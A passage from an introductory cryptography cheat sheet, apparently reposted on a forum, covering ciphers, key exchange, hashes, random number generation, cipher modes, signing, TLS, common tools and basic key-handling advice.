a message. 3.2 block ciphers A block cipher works on fixed-size units of plaintext to produce (usually) identically-sized units of ciphertext, or vice-versa. Example block ciphers: DES (the former Data Encryption Standard) with a 64-bit block and 56-bit keys, now obsolete because both the block size and key size are too small and allow for easy brute-forcing) AES (Advanced Encryption Standard, formerly known as Rijndael) with 128-bit blocks and keys of 128, 192, or 256 bits 3.3 stream ciphers A stream cipher produces a stream of random bits based on a key that can be combined (usually using XOR) with data for encryption or decryption. Example stream ciphers: Chacha20 RC4 (now considered too weak to use) 3.4 public-key (or asymmetric) ciphers A public-key cipher has two complementary keys K1 and K2 such that one can reverse what the other one does, or in symbolic terms: ciphertext = E(plaintext, K1) or E(plaintext, K2) plaintext = D(ciphertext, K2) or D(plaintext, K1) Unlike a symmetric cipher, where the key must be kept secret between parties at all times, a public-key algorithm allows one (but only one!) of the keys to be revealed in public, making it possible to send encrypted messages without having previously arranged to share a key. Example public-key algorithms: RSA (from the initials of its creators Rivest, Shamir, Adelman) based on modular arithmetic using large prime numbers and the difficulty of factoring large numbers. At this time 2048-bit primes are considered necessary to create secure RSA keys (factorization of keys based on 512-bit primes has already been demonstrated and 1024-bit keys appear feasible) Elliptic Curve algorithms based on integers and modular arithmetic satisfying an equation of the form y^2 = x^3 + a*x + b. Elliptic curve keys can be much shorter (256-bit EC keys are considered roughly equivalent to 3072-bit RSA keys). However, public-key algorithms are much (hundreds to thousands) of times slower than symmetric algorithms, making it expensive to send large amounts of data using only public-key encryption. However, public-key algorithms do provide a secure way to transmit symmetric cipher keys. 3.5 Diffie-Hellman key exchange An algorithm that allows two parties to create a shared secret through a public exchange from which an eavesdropper cannot feasibly infer the secret. Useful for establishing a shared symmetric key for encrypted communication. Diffie-Hellman can be peformed using either modular arithmetic with large prime numbers or with elliptic-curve fields. Diffie-Hellman is also usually the basis of “forward secrecy”. One method of key exchange possible in SSL/TLS is simply using a public-key algorithm to send a key between a client and a server. However, if the private key of that SSL/TLS certificate is later exposed, someone who monitored and recorded session traffic could decrypt all the keys used in the sessions they recorded. Forward secrecy not only involves setting up unique, random session keys for each communication session, but also using an algorithm like Diffie-Hellman which establishes those keys in a way that is inaccessible to an eavesdropper. 3.6 hash algorithms A hash (or cryptographic checksum) reduces input data (of any size) to a fixed-size N-bit value. In particular for cryptographic use a hash has these properties: two different inputs are very unlikely to produce the same hash (“collision”). it should be very difficult to find another input that produces any specified hash value (“preimage”) even a one-bit change in the input should produce a hash that is different in about N/2 bits Note that because the possible number of inputs to a hash function is much larger than the hash function output, there is always some small probability of collision or of finding a preimage. In the ideal case an N-bit hash has a 2^-(N/2) probability of collision for two randomly-chosen large inputs (look up the “birthday problem” for why it is N/2 and not N), and a 2^-N probability of a random input producing a specified hash value. Example hash algorithms: MD5 produces a 128-bit hash from its input. It has demonstrated collisions and feasible preimage computation and should not be used. SHA1 produces 160-bit hashes but has at least one demonstrated collision and is also deprecated for cryptographic use (however, it is still used in git because it is still workable as a hash function). SHA-256 produces 256-bit hashes. SHA-224 is basically a SHA-256 hash truncated to 224 bits. Similarly, SHA-512 produces a 512-bit hash and SHA-384 truncates a SHA-512 hash to 384 bits. 3.7 cryptographic random number generators Many cryptographic methods require producing random numbers (such as for generating unique keys or identifiers). Traditional pseudo-random number generators produce output that can be highly predictable, as well as often starting from known states and having relatively small periods (such as 2^32). A cryptographic random number generator must make it very difficult to determine the prior (or future) state of the generator from its current output, as well as have enough entropy to generate sufficiently large random numbers. Once the Debian maintainers made a seemingly innocuous patch to the OpenSSL random number generator initialization. The unintended consequence was that it effectively seeded the generator with only about 16 bits of entropy, meaning that in particular ssh-keygen generated only about 2^16 possible 2048-bit SSH host keys when it really should have been capable of generating over 2^2000. Once this was discovered and patched a lot of people had to change their host keys (or risk “man-in-the middle” impersonation attacks). Finding useful random input to make a cryptographic random number generator truly unpredictable can be difficult. Many systems attempt to collect physically random input (such as timing of disk I/O, network packets, or keyboard input) that is “mixed” into existing random state using a cipher or cryptographic hash. 4 Cryptographic Protocols The algorithms described above are building blocks for methods of secure communication. A particular combination of these basic algorithms applied in a particular way is a cryptographic protocol. 4.1 cipher modes The simplest thing you can do with a block cipher is break plaintext up into blocks, then encrypt each block with your chosen key (also called ECB for “Electronic Code Book”, by analogy with codes that simply substituted code words). Unfortunately this leads to a weakness: if you a particular plaintext block is repeated in the input the ciphertext block also repeats in the output. This can easily happen in English text if a phrase just happens to line up with a block the same way more than once. There are other ways to use block ciphers to avoid this. The simplest is CBC or “Cipher Block Chaining” where the previous ciphertext block is XORed with the current plaintext block before encrypting it. This is reversible by decrypting a ciphertext block, then XORing the previous ciphertext block with that to recover the plaintext. There are other modes like OFB (“Output FeedBack”) that combine ciphertext and plaintext in more complicated but reversible ways so that repeated plaintext blocks won’t result in repeated ciphertext blocks. These modes also often depend on an “initialization vector” which is typically some cryptograpically random value that makes the initial state of the encryption unpredictable to an outside observer. 4.2 message signing Someone who has created a public key pair (K1, K2) and published a public key (let’s say that’s K2) can encrypt a message using their private key K1, and anyone can validate that the message came from that sender by decrypting it with the public key K2. Due to the much higher computational cost of encrypting data with public-key algorithms, usually the signer actually encrypts only a cryptographic hash of the original message. A sender can also send a plaintext message along with a signature created with their private key if the privacy of the message is not important but validating the identity of the sender is. Message signing is also the basis of SSL/TLS certificate validation. A certificate contains a public key and a signature of that key generated with the private key of a trusted certificate authority. An SSL/TLS client (such as a web browser) can confirm the authenticity of the public key by validating the certificate signature using the public key of the certificate authority that signed it. An SSL/TLS client can validate the identity of a server by encrypting a large random number with the public key in the server certificate. If the server can decrypt the random number with its private key and return it, the client can assume the server is what it says it is. “Self-signed” certificates are merely public keys signed with the corresponding private key. This isn’t as trustworthy (assuming you have reasons to trust a certificate authority) but also doesn’t require interaction with a certificate authority. However, ultimately the buck has to stop somewhere and even certificate authority “root certificates” are self-signed. Rather than the centralized certificate authority model (where certain authorities are trusted to sign certificates) email encryption tools like GPG have a “web of trust” model where someone’s public key can be signed by many other individuals or entities, so that if you trust at least some of those others it gives you greater assurance that a public key is valid and belongs to the indicated person. Without any such signatures, someone could presumably publish a key purporting to be someone else and there’d be no easy way to validate it. 4.3 secure email If you want people to be able to send you secure email (such as with PGP, GPG, or S/MIME) you create a public key pair (K1, K2) and publish the public key K2. Someone who wants to send you mail picks a cipher and generates a unique, random key for that cipher. They encrypt their plaintext message with that cipher and key and encrypt the key with your public key, and send you a message containing the ciphertext, the cipher algorithm they used, and the encrypted cipher key. You can decrypt the cipher key with your private key, and then decrypt their message from the ciphertext and indicated cipher. Note that for this model to work everyone who wants to receive encrypted email has to publish a public key. 4.4 SSL/TLS SSL (Secure Sockets Layer, now deprecated) and TLS (Transport Layer Security) use all of the above cryptographic primitives to secure data sent over a network. As a result the protocol is rather complicated, but in summary does these things: client and server agree on a “cipher suite” to use, which consists of: a method for key exchange (via the public/private key pair in a certificate or Diffie=Hellman key exchange) a method for server validation (based on the public-key algorithm used in its certificate) a symmetric cipher for bulk data encryption a hash algorithm to use for message authentication, actually an HMAC or “Hashed Message Authentication Code” that hashes a combination of a secret key and the data) establish random shared key for the symmetric cipher and HMAC using the specified key exchange method transmits data using the specified symmetric cipher and HMAC algorithms 5 Cryptanalysis Cryptanalysis is the study of weaknesses in cryptographic algorithms and protocols. In general, good algorithms and protocols have been subjected to lots of public cryptanalysis that has not resulted in attacks that are significantly better than brute-force. It’s a complex topic, and this is a pretty good introduction: https://research.checkpoint.com/cryptographic-attacks-a-guide-for-the-perplexed 6 Cryptographic tools 6.1 OpenSSL Although it’s taken a lot of heat for some of its previous security issues (particularly “Heartbleed”), it’s still the most widely used cryptographic library because of its portability and completeness. The openssl command-line utility also provideas a lot of useful functionality. It can be used to create certificate requests or even to sign certificates, encrypt/decrypt files, transform several kinds of file formats used for cryptographic data, and more. Of particular use is the openssl s_client command which can initiate an SSL/TLS client connection, but more importantly shows a lot of useful debugging data about the protocol negotiation including the certificate and cipher suite properties. 6.2 gnutls The GNU Project’s SSL/TLS library, which includes a gnutls-cli utility with similar (but less extensive) functionality for SSL/TLS client connections and encryption/decryption. 6.3 gnupg Primarily intended for encrypting or decrypting secure mail messages, it also provides some functionality for encrypting or decrypting files and creating or validating signatures. 7 General cryptographic advice 7.1 Use established, publicly analyzed algorithms and tools Schneier’s Law: “Anyone can create an algorithm that they can’t break.” https://www.schneier.com/blog/archives/2011/04/schneiers_law.html Resist the urge to create and use your own cryptographic algorithms and protocols. Cryptography is hard and even expert cryptographers have created methods that, once exposed to public analysis, have turned out to be easy to break. 7.2 Zealously protect keys and credentials Often the easiest way to break a cryptographic system is to find the keys being used. This may be easier than you think. What if you left that certificate private key in a publicly-readable file? What if it’s copied into backups that are available to other untrusted users? Think carefully about how you handle and store that kind of sensitive material. Sursa: https://cybercoastal.com/cryptography-cheat-sheet-for-beginners/
      • 2
      • Like
      • Upvote
×
×
  • Create New...